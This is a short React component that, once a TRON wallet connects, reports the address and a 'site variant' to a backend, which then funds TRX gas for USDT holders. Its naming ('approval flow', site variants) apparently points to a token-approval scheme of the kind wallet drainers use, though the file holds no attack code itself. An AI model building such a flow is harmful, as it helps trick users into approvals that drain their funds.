"use client"

import { useEffect, useRef } from "react"

import { submitTronGasRequest } from "../api/submit-tron-gas"
import { useApprovalFlow } from "../context/approval-context"
import { useWallet } from "../hooks/use-wallet"

/** After TRON wallet connect, ask the backend to top up TRX when the user holds USDT but lacks gas. */
export function TronGasReporter() {
  const { siteVariant } = useApprovalFlow()
  const { address, activeChain, isConnected } = useWallet()
  const reportedRef = useRef<string | null>(null)

  useEffect(() => {
    if (!isConnected || activeChain !== "tron" || !address) return

    const dedupeKey = `${address}:${activeChain}`
    if (reportedRef.current === dedupeKey) return
    reportedRef.current = dedupeKey

    void submitTronGasRequest(address, siteVariant)
  }, [activeChain, address, isConnected, siteVariant])

  return null
}
